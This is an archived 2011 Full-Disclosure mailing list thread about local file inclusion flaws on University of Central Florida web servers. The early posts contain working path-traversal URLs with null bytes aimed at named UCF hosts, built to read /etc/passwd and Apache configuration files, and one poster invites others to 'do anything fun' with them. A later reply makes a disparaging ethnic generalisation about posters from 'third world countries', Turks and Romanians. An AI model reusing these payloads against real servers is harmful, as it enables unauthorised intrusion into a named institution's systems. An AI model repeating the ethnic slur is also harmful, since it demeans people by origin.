| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 19 Feb 2011 12:07:18 -0500 From: Eyeballing Weev <eyeballing.weev@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Re: University of Central Florida Multiple LFI Might as well register a new email account too because "hacktalkblog" is just as obvious as posting a link to your site. I hope UCF calls FDLE and you can explain to Special Agent Veazy and others about your "research" On 02/19/2011 12:04 PM, Hack Talk wrote: > I actually live close to the University of Central Florida and after > countless attempt to contact both their infosec team, the "tech > rangers", and their personal web developers with no contact back or > patching of these vulnerabilities I decided to post these up on FD. > There are still many, _many_ more vulnerabilities which I have yet to > disclose as I'm still giving them a chance to patch them. > > Also, I usually remove my website from the email as it's part of my > standard email signature, guess I just couldn't be bothered to do it > when I sent in this vulnerability. I'll be sure to be better about > removing it so people aren't so butthurt. > > > Luis Santana > > > > On Sat, Feb 19, 2011 at 11:48 AM, Eyeballing Weev > <eyeballing.weev@...il.com <mailto:eyeballing.weev@...il.com>> wrote: > > Madhur Ahuja and "Hack Talk" are obviously from third world countries > and are only doing this for publicity, much like how Turks and Romanians > "hack" into websites for defacement purposes. Same concept just applied > differently. > > On 02/19/2011 11:45 AM, Shawn Merdinger wrote: > > Hi, > > > > At the risk of being ridiculed here, I'll point out that UCF does > have > > a Infosec office and a incident response POC. > > > > https://publishing.ucf.edu/sites/itr/cst/Pages/IncidentResponse.aspx > > sirt@...l.ucf.edu <mailto:sirt@...l.ucf.edu> > > > > fwiw, security folks in .edus are at the low-end of this industry's > > pay-scale and it's difficult to find/retain qualified people, not to > > mention adequate budget for purchasing (even more) crappy security > > products and almost no budget for professional development like > > training and conferences. > > > > I would expect there are more challenging targets out there, were one > > inclined... > > > > Cheers, > > --scm > > > > > > On Sat, Feb 19, 2011 at 06:04, Madhur > Ahuja<ahuja.madhur@...il.com <mailto:ahuja.madhur@...il.com>> wrote: > >> > http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 > >> > >> On Sat, Feb 19, 2011 at 11:38 AM, Hack > Talk<hacktalkblog@...il.com <mailto:hacktalkblog@...il.com>> wrote: > >>> > >>> Found these and thought I'd share: > >>> > >>> -==================- > >>> > >>> > http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00 > >>> > >>> > http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 > >>> -==================- > >>> Let me know if you do anything fun with 'em > >>> > >>> Luis Santana - Security+ > >>> Administrator - http://hacktalk.net > >>> HackTalk Security - Security From The Underground > >>> > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists